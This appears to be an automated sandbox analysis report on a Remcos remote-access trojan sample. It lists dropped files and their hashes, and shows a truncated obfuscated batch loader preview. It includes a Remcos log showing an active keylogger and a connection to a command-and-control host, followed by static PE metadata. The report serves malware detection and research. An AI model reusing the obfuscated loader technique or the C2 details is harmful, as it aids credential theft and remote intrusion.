                                                                                                                                                  Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                                                                                  C:\Users\Public\Libraries\easinvoker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):131648
                                                                                                                                                  Entropy (8bit):5.225468064273746
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                                                  MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                                                  SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                                                  SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                                                  SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                                                                                  • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                                                                                  • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                                                                                  • Filename: VdwJB2cS5l.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Purchase order.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Quotation 20242204.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: pSfqOmM1DG.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: XY2I8rWLkM.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: 2020.xls, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\Public\Libraries\netutils.dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):116908
                                                                                                                                                  Entropy (8bit):5.087211878722834
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
                                                                                                                                                  MD5:566B326055C3ED8E2028AA1E2C1054D0
                                                                                                                                                  SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
                                                                                                                                                  SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                                                                                                                                                  SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                  • Antivirus: Virustotal, Detection: 68%, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.^........& ....."...$................<a.............................0................ ..............................................................`..(...............\........................... ...(................................................... ...0!.......".................. .P`. ........@.......(..............@.p.. .......P.......0..............@.P@. ..(....`.......6..............@.0@. .......p.......:..............@.0@. ..................................p.. ...............<..............@.0@. ...............>..............@.0.. ....X............F..............@.@.. ....h............H..............@.`.. ..\............J..............@.0B/4...................L..............@.PB/19..................P..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:JSON data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):965
                                                                                                                                                  Entropy (8bit):5.0061630437862155
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                                                                                                                                  MD5:664DA71A99A7A7C426134240B73EF767
                                                                                                                                                  SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                                                                                                                                  SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                                                                                                                                  SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv2770.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdd81a22, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15728640
                                                                                                                                                  Entropy (8bit):0.9443644641193542
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:wKCS8rMTkTaTeUZT+T5SFnTKXpmljVvK:wKrTGW
                                                                                                                                                  MD5:080D97E922C1C94DFF9506548AD69ED2
                                                                                                                                                  SHA1:43A7F133E1E57ED40FE1C2BD48BF0FDCD0D11E0E
                                                                                                                                                  SHA-256:DC9F1D617E043E9509E9C10868898DB14DCD5C1A4A10832B9AD0357884748997
                                                                                                                                                  SHA-512:7D39BBFCFFB81326657983A099EFF341E088AC1D506DCD944B590B877AE7D51D4E6E7DAB330F0F742B8C93724060D93535805122D7C315CD2370312DC0785A22
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..."... .......!........v.......{......................d........$...{.......|o.h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{....................................i).....|o..........................|o..........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bhv3CFC.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdd81a22, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15728640
                                                                                                                                                  Entropy (8bit):0.9503688979690579
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:wKCS8r8TkTaTeUZT+T5SFnTKXpmljVJl:wKbTGW
                                                                                                                                                  MD5:54A3A7C1DD861626D7759F495D6C94D6
                                                                                                                                                  SHA1:1B05DB9EA6781A193986D935FE5E8B7BD468AE2D
                                                                                                                                                  SHA-256:984B1A4F672001A27DF94BDBAC91639D5E1EBA7428E1AA73E61C04DACA51C0D1
                                                                                                                                                  SHA-512:3F90890FA4F11EE442796D1A188E55DA6F81EB26B2AAB5C38F826495F680472A5644F7D665E5DCD21E15216930F8BA6F84DA3865957AF0E6D9693E3A626F3321
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..."... .......!........v.......{......................d........$...{.......|o.h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{....................................i).....|o..........................|o..........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cidefd

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kcrrhbu

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..

                                                                                                                                                  \Device\ConDrv

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):624
                                                                                                                                                  Entropy (8bit):4.520545489563329
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:caFqFkLmxyRbmkclkL6hnRRJzI9X/XqdX4XljW3nQsW3vygGn:7QFtUbmjlpRb+yWXxW3/W3k
                                                                                                                                                  MD5:724DED658FED593BC4FBD00EE468B3BF
                                                                                                                                                  SHA1:9A5620449C45468EAD2E2F4CA3D588938C135BEE
                                                                                                                                                  SHA-256:549C274DE97EB69F29900A926DA4CDC6468A0A32FDF5EFFFE66766F99847343C
                                                                                                                                                  SHA-512:0575DB29C03D44B18300613925247A1544C0C178BB5364CFF06B8CB2FEFBBACBA22910C236FC96B159DCAC1AE840A3BDA016D79FE12455EDA1CA602C37A081F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:... ______ ...(_____ \ ... _____) )_____ ____ ____ ___ ___ ...| __ /| ___ | \ / ___) _ \ /___)...| | \ \| ____| | | ( (__| |_| |___ |...|_| |_|_____)_|_|_|\____)___/(___/ .....Remcos v4.9.4 Pro.... BreakingSecurity.net....07:20:39:763 i | Remcos Agent initialized..07:20:39:763 i | Offline Keylogger Started..07:20:39:763 i | Access Level: Administrator..07:20:39:763 i | Connecting | TLS Off | oceansss.duckdns.org:1144..07:20:40:402 i | Connected | TLS Off | oceansss.duckdns.org:1144..07:20:40:906 i | KeepAlive | Enabled | Timeout: 60..

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.422807171812134
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  File name:fu56fbrtn8.exe
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5:da7c2473b5c455f25f420827af596286
                                                                                                                                                  SHA1:101b5f991a26fc9213c4445bd9bfdb87a6a6c5cb
                                                                                                                                                  SHA256:e1cecfcc4eed2f4b74af7d971dcf24555534db164ddb0b7cd1e821b2f0402703
                                                                                                                                                  SHA512:cd6b9cd996c3bca3aa0be5d0cebebb7db1701878d5c62354d6df4c880d4af8007c95baf7f0ac9e75b099c7b3573dc23afa3a872213a9963b84c86028e6969959
                                                                                                                                                  SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/B8M6wIJp4m+3bu8U2flxAv:QkTpT9K1mzy8M6wW4mEQ2W
                                                                                                                                                  TLSH:B575BE51B790D1B3E03B10FED73AB5D862CDBAA4295374CCB2D50A7BDE37982244524E
                                                                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:3575b4a8b0b085d1

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x4575c0
                                                                                                                                                  Entrypoint Section:CODE
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                  DLL Characteristics:
                                                                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:55bb4abe492867a8202968458cfd638d

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  push ebp
                                                                                                                                                  mov ebp, esp
                                                                                                                                                  add esp, FFFFFFF0h
                                                                                                                                                  mov eax, 00457400h
                                                                                                                                                  call 00007FA868D6A6B5h
                                                                                                                                                  mov eax, dword ptr [0056C65Ch]
                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                  call 00007FA868DB2A29h
                                                                                                                                                  mov ecx, dword ptr [0056C740h]
                                                                                                                                                  mov eax, dword ptr [0056C65Ch]
                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                  mov edx, dword ptr [00456D98h]
                                                                                                                                                  call 00007FA868DB2A29h
                                                                                                                                                  mov eax, dword ptr [0056C65Ch]
                                                                                                                                                  mov eax, dword ptr [eax]
                                                                                                                                                  call 00007FA868DB2A9Dh
                                                                                                                                                  call 00007FA868D68670h
                                                                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1710000x78.edata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x16e0000x2066.idata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x17b0000x1c600.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1740000x6328.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x1730000x18.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  CODE0x10000x566080x56800e749dfadfcac9668fb6395a24d87ee54False0.5225823022037572data6.515156263316965IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  DATA0x580000x1147cc0x114800fd59e5a635ce7a9c0333402e3d827865False0.7515946400316456data7.548878208451603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  BSS0x16d0000xd5d0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .idata0x16e0000x20660x22003aa6d5d6785cddb9a5bee660a602eb8eFalse0.35340073529411764data4.887767818013599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .edata0x1710000x780x20086a99c9586c90c6cc57ed7fd9ed47346False0.2109375data1.5388005609521742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                  .tls0x1720000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rdata0x1730000x180x2009d1bba21368430faa0bf768fbfaa7fe5False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "W"0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1740000x63280x64003a96abebf4210d131401c2199c50cc0aFalse0.6482421875data6.687430221930037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x17b0000x1c6000x1c60076ae21a9e1fd9d25b479364b03fa95c9False0.13988504955947137data4.178255960193848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_CURSOR0x17b8000x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                  RT_CURSOR0x17b9340x134data0.4642857142857143
                                                                                                                                                  RT_CURSOR0x17ba680x134data0.4805194805194805
                                                                                                                                                  RT_CURSOR0x17bb9c0x134data0.38311688311688313
                                                                                                                                                  RT_CURSOR0x17bcd00x134data0.36038961038961037
                                                                                                                                                  RT_CURSOR0x17be040x134data0.4090909090909091
                                                                                                                                                  RT_CURSOR0x17bf380x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                  RT_ICON0x17c06c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.28635084427767354
                                                                                                                                                  RT_ICON0x17d1140x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.18278008298755186
                                                                                                                                                  RT_ICON0x17f6bc0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.11275415896487985
                                                                                                                                                  RT_ICON0x184b440x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.10086466165413534
                                                                                                                                                  RT_ICON0x18b32c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.08608366617616145
                                                                                                                                                  RT_STRING0x1947d40x1d4AmigaOS bitmap font "n", fc_YSize 27392, 18688 elements, 2nd "S", 3rd0.43162393162393164
                                                                                                                                                  RT_STRING0x1949a80x1c8data0.4298245614035088
                                                                                                                                                  RT_STRING0x194b700xe8data0.603448275862069
                                                                                                                                                  RT_STRING0x194c580x2f8data0.45
                                                                                                                                                  RT_STRING0x194f500xd8data0.5879629629629629
                                                                                                                                                  RT_STRING0x1950280x22cdata0.48201438848920863
                                                                                                                                                  RT_STRING0x1952540x3f4data0.3715415019762846
                                                                                                                                                  RT_STRING0x1956480x370data0.39431818181818185
                                                                                                                                                  RT_STRING0x1959b80x3e8data0.33
                                                                                                                                                  RT_STRING0x195da00x234data0.475177304964539
                                                                                                                                                  RT_STRING0x195fd40xecdata0.5508474576271186
                                                                                                                                                  RT_STRING0x1960c00x1b4data0.5206422018348624
                                                                                                                                                  RT_STRING0x1962740x3e4data0.32028112449799195
                                                                                                                                                  RT_STRING0x1966580x358data0.4158878504672897
                                                                                                                                                  RT_STRING0x1969b00x2b4data0.4060693641618497
                                                                                                                                                  RT_RCDATA0x196c640x10data1.5
                                                                                                                                                  RT_RCDATA0x196c740x22cdata0.7751798561151079
                                                                                                                                                  RT_RCDATA0x196ea00x652Delphi compiled form 'TForm1'0.43325092707045737
                                                                                                                                                  RT_GROUP_CURSOR0x1974f40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                  RT_GROUP_CURSOR0x1975080x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                  RT_GROUP_CURSOR0x19751c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                  RT_GROUP_CURSOR0x1975300x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                  RT_GROUP_CURSOR0x1975440x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                  RT_GROUP_CURSOR0x1975580x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                  RT_GROUP_CURSOR0x19756c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                  RT_GROUP_ICON0x1975800x4cdata0.8421052631578947

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                                                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
